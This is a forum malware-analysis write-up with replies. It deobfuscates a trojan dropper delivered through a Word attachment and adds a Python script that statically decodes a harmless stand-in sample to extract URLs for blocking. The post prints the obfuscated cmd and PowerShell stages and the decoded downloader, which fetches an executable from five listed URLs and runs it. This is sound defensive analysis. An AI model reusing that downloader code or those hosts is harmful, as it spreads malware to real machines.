Nestor10's Malware Analysis 101 - Anatomy of a Trojan Part 1/?

reverseengineering

#1

Hello all, Nestor10 here to share a couple things I’ve learned in my day job as an infosec samurai. If you want to know some vague things about me, you can check out my introduction.

So a few months ago, I noticed some emails coming in with really sketchy attachments - a few dozen had been delivered before I noticed, so I needed to quickly figure out what the attachments did!

DISCLAIMER

This breakdown uses a real trojan drop script from late last year. While I’m fairly sure none of the URLs in the script are still hosting any malicious code, you should proceed with the utmost caution. Do not attempt to actually run any portion of the code shown below. If you disregard this warning, you do so at your own risk, and I will not be helping you clean your system of whatever infection you end up with.

I dumped a sample in my trusty sandbox and got to work (you can use reverse.it or malwr.com to do the same). I get some interesting stuff back from dynamic analysis:

WINWORD.EXE /n "C:\Wire transfer info.doc" /o "u" (PID: 464)

cmd.exe "cmd /v /c "set %WPIWCBNzG%=RBnUjZTzm&&set %IPmmCqufN%=p^o^w^e^r^s&&set %PWKdRtDdJ%=mYnZmpJdh&&set %XZnNiozwI%=he^l^l&&set %ARXbYFCDI%=zwmAfmaLS&&!%IPmmCqufN%!!%XZnNiozwI%! ^-^e LgAoACgAVgBhAFIAaQBBAGIATABlACAAJwAqAG0AZAByACoAJwApAC4AbgBhAE0ARQBbADMALAAxADEALAAyAF0ALQBqAE8ASQBOACcAJwApACAAKAAiACAAJAAoAHMAZQBUAC0AaQB0AGUAbQAgACAAJw [lots of this removed for space] AAgAGYATwBSAEUAYQBDAEgAIAB7ACAAKABbAEkATgBUAF0AIAAkAF8AIAAtAGEAcwBbAEMASABhAHIAXQApAH0AKQAgACsAIgAkACgAUwBlAHQALQB2AGEAUgBpAEEAYgBMAGUAIAAnAG8AZgBTACcAIAAgACcAIAAnACkAIgApACAA (PID: 1304) 

Well that’s obviously not doing anything good, but what is it doing? Further down the process tree we get something a little less obscure:

powershell.exe powershell -e [wall of base64 removed] (PID: 912, Additional Context:  .((VaRiAbLe '*mdr*').naME[3,11,2]-jOIN'') (" $(seT-item 'VARIable:OFS' '') " +[STrING]( (36, 119,115, 99,114, 105,112 ,116 ,32 , 61 , 32 ,110 ,101 ,119 ,45,111 , 98,106,101,99,116 , 32,45, 67 , 111 ,109 , 79,98, 106,101, 99 ,116 , 32 , 87 , 83 ,99, 114 ,105 , 112,116, 46 , 83 , 104,101 ,108, 108,59 , 36,119 ,101 ,98 ,99 ,108,105, 101, 110, 116 ,32,61 , 32 , 110 ,101 , 119 ,45,111 ,98, 106,101 , 99,116, 32 , 83,121,115,116, 101, 109,46 , 78, 101,116 , 46 , 87,101,98, 67, 108 , 105 , 101 , 110 ,116 ,59 ,36 , 114 ,97 ,110, 100 ,111 ,109 , 32,61,32, 110, 101,119 , 45 , 111, 98, 106,101, 99 , 116 , 32 ,114,97 , 110 , 100,111,109,59 ,36 ,117 , 114 , 108, 115 ,32 , 61 , 32 ,39,104, 116,116,112, 58 ,47,47 , 108 ,117, 110 ,122,101, 114, 46,100, 101,47 , 76,83 ,106 , 108 , 74,81 ,100, 47, 44 , 104,116 , 116 ,112, 58 ,47 ,47,97 ,117,114, 103,101 , 108, 109 , 105 , 114,46,100,101 ,47 ,66,114, 77,103 ,47,44, 104,116,116 ,112,58,47, 47,112 ,117,105,107, 112 , 114,111 ,100, 117,107, 116 , 105 ,101 ,115, 46, 110 , 108 , 47,82 ,77 , 97, 117 ,87 ,71, 103 , 69, 47 ,44, 104, 116, 116,112,58 ,47,47, 98 ,114,111,99, 107, 101 ,45 , 108 , 111, 101 ,104, 114, 46 , 100, 101 ,47 ,109, 107,70 ,82 ,70, 72,70, 47,44 , 104 , 116 , 116,112,58 ,47,47 ,98 , 106 ,104,46, 100, 101 ,47 , 115 ,85 ,107 , 117,47,39 ,46 , 83 ,112 , 108,105 ,116 , 40 , 39, 44,39,41 , 59 ,36 ,110 , 97, 109, 101, 32,61 , 32, 36 ,114 ,97 , 110,100, 111 , 109,46,110 ,101, 120 , 116 , 40,49 , 44 ,32 ,54, 53 ,53, 51, 54,41, 59,36,112, 97 ,116 , 104 , 32 , 61 ,32, 36,101, 110, 118 , 58 ,116,101 , 109 , 112, 32 , 43,32 , 39,92 , 39,32,43 ,32, 36, 110 ,97,109,101 ,32 , 43,32 , 39 ,46,101, 120,101 ,39, 59 , 102 , 111,114 ,101,97 , 99 , 104 ,40 ,36 , 117 , 114 , 108 ,32,105 ,110, 32,36 , 117,114, 108 , 115 , 41,123 , 116,114 , 121,123 ,36 , 119, 101 , 98 , 99,108 ,105 ,101 , 110,116 , 46 ,68,111 ,119, 110 , 108, 111,97 ,100,70,105,108 , 101, 40 , 36 
,117 ,114 ,108, 46, 84,111,83 ,116,114, 105, 110 , 103 , 40, 41,44 , 32 , 36,112 , 97 ,116,104 , 41 ,59, 83 ,116 ,97,114 ,116 ,45 ,80, 114 ,111, 99,101 , 115 ,115 , 32 ,36,112 ,97,116 ,104,59 ,98, 114 , 101 , 97, 107, 59, 125 ,99, 97,116, 99 ,104,123, 119 ,114 ,105,116 , 101 , 45,104 , 111 , 115 ,116 , 32 ,36,95 ,46,69, 120, 99 ,101,112,116,105 ,111, 110 , 46 ,77, 101 ,115 , 115 ,97 ,103,101 ,59, 125,125) | fOREaCH { ([INT] $_ -as[CHar])}) +"$(Set-vaRiAbLe 'ofS' ' ')");)
    35087.exe (PID: 1608)
        35087.exe (PID: 2368)

So it looks like we’ve called PowerShell and then spawned some binaries from that… but we’re still no closer to understanding how to respond to this threat being on our network.

Looking at the code, we can tell that there are some strings being joined in weird ways, there’s some implicit evaluation going on with parentheses, and then we’ve got a whole ton of char codes, all being piped to foreach which is converting them to chars. So just like the original wall of base64 stuff that was run on cmd.exe, this should basically be creating a string to eval somehow.

Here’s where things get hairy - it’s not easy to figure out what string this will produce without eval()ing it ourselves. That means we have to figure out a way to remove its fangs before we proceed. Let’s take a look at the first bit of code:

.((VaRiAbLe '*mdr*').naME[3,11,2]-jOIN'')

Nothing too dangerous there. What happens if we run it?

cmdlet Invoke-Expression at command pipeline position 1

Aha! We found the claws, now we can just run the rest of the script. Here’s the secret it divulges to us:

$wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://lunzer.de/LSjlJQd/,http://aurgelmir.de/BrMg/,http://puikprodukties.nl/RMauWGgE/,http://brocke-loehr.de/mkFRFHF/,http://bjh.de/sUku/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}

When I ran the dynamic analysis, it gave me 1 IP to look into… but now that we’ve pulled apart the code, it’s clear that I need to be looking for any traffic to any URL in the $urls string there.

Thanks to our l33t [email protected] skilz, the affected users have been dismissed out the nearest airlock and we can block all the future traffic. Hurray!

Thanks for reading this cringe-worthy, sad excuse for a writeup. It’s my first time putting something like this together for a larger audience than the suits at work, so any feedback you might have will be appreciated immensely by myself. Same goes for any questions. :slight_smile:

Until next time,
Nestor0x0000000A
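The safe way to get at that string is to never let PowerShell evaluate it: pull the decimal array out of the script text, map the codes to characters yourself, and read the URLs off the result for your block list. The script below is an added example of that static approach, not Nestor10's code. The SAMPLE is a constructed stand-in in the same shape as the sandbox output above; it decodes to a harmless line that only names .invalid hosts, not the real payload. The one piece of knowledge it assumes beyond the post is that in a default PowerShell session the wildcard '*mdr*' matches the preference variable $MaximumDriveCount, which is why indexing its name at 3,11,2 spells the cmdlet alias the post saw resolve to Invoke-Expression.

```python
import re

# Constructed sample in the shape of the obfuscated stage from the writeup:
# decimal char codes piped through foreach/[char]. It decodes to a harmless
# stand-in that only references .invalid hosts; it is NOT the real payload.
SAMPLE = (
    ".((VaRiAbLe '*mdr*').naME[3,11,2]-jOIN'') (\" $(seT-item 'VARIable:OFS' '') \" "
    "+[STrING]( (36, 117,114, 108,115, 32 , 61 ,32,39 ,104, 116,116 ,112, 58, 47 ,47, "
    "97 , 46,105,110 ,118, 97,108, 105 ,100 , 47,120 ,47 ,44, 104,116, 116,112 ,58 , "
    "47,47 ,98, 46 ,105,110,118 , 97 ,108,105 ,100, 47, 121 ,47 ,39, 46, 83,112 ,108, "
    "105,116 ,40, 39,44 ,39 ,41 , 59) | fOREaCH { ([INT] $_ -as[CHar])}) "
    "+\"$(Set-vaRiAbLe 'ofS' ' ')\")"
)

# Assumption (my knowledge, not stated in the post): the only variable matching
# '*mdr*' in a default session is $MaximumDriveCount, so the name-index trick
# is resolved against that string rather than by running anything.
MATCHING_VARIABLE_NAME = "MaximumDriveCount"

# The char-code array: "( (n, n, ... n) | foreach" with arbitrary spacing.
CHARCODE_BLOCK = re.compile(r"\(\s*\(\s*((?:\d+\s*,\s*)*\d+)\s*\)\s*\|\s*fOREaCH", re.I)
# The ".naME[i,j,k] -join ''" construct used to spell a cmdlet name.
INDEX_TRICK = re.compile(r"\.naME\[([\d,\s]+)\]\s*-jOIN\s*''", re.I)
# Loose URL matcher for pulling indicators out of the decoded text.
URL_RE = re.compile(r"https?://[^\s'\",;]+")


def resolve_name_index_trick(script: str, variable_name: str = MATCHING_VARIABLE_NAME) -> str:
    """Spell out whatever the [i,j,k] index trick builds from the variable name."""
    m = INDEX_TRICK.search(script)
    if not m:
        return ""
    indexes = [int(i) for i in m.group(1).split(",")]
    return "".join(variable_name[i] for i in indexes)


def decode_charcodes(script: str) -> str:
    """Statically decode the char-code array into the string it would build."""
    m = CHARCODE_BLOCK.search(script)
    if not m:
        raise ValueError("no char-code array found in script")
    codes = [int(n) for n in re.findall(r"\d+", m.group(1))]
    # Refuse to guess at anything outside printable ASCII; flag it for a human.
    bad = [c for c in codes if not 32 <= c < 127]
    if bad:
        raise ValueError(f"non-printable char codes present: {bad[:5]}")
    return "".join(chr(c) for c in codes)


def extract_urls(decoded: str) -> list:
    """Every URL in the decoded stage, in the order the script would try them."""
    return URL_RE.findall(decoded)


def analyze(script: str) -> dict:
    """One-shot report: what gets invoked, what it builds, what to block."""
    decoded = decode_charcodes(script)
    return {
        "invoked_via": resolve_name_index_trick(script),
        "decoded": decoded,
        "urls": extract_urls(decoded),
    }


if __name__ == "__main__":
    report = analyze(SAMPLE)
    print("invoked via :", report["invoked_via"])
    print("decoded     :", report["decoded"])
    for url in report["urls"]:
        print("block       :", url)
```

Run it against the sandbox's "Additional Context" text instead of SAMPLE and the urls list is the full set to watch for in proxy and DNS logs, not just the one IP the sandbox happened to contact. The printable-range check is deliberate: a real sample that decodes to non-ASCII is usually a second layer of encoding, and it is better to stop and look than to silently produce garbage.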


(Standard User) #2

This post was flagged by the community and is temporarily hidden.


(fxbg) #3

I remember when Trojans only affected Windows… oh wait, this one too, darn, thought we turned a corner!

Also, about the http://lunzer.de/ link, I wonder if the trojan author was stupid enough to use his personal website for this or if this domain is fronted/hijacked?


#4

Most likely hijacked - a vast majority of the things I end up temp blocking on my network are personal sites, blogs, etc. Lots of WordPress sites.

The file downloaded from that site would most likely be a stage 2 dropper that would then deliver the actual malware (sometimes from an actual C2).


#5

Not a bad write-up at all. Can learn something from anything if you take the time to do so. Nice post.


#6

Please don’t flag Suser - he posted this because I’d made a joke on the IRC channel. :slight_smile:


#7

suser was being suser. No worries @Nestor10, it was just flagged/hidden because it was not helpful for this thread and the potential discussions about it :wink: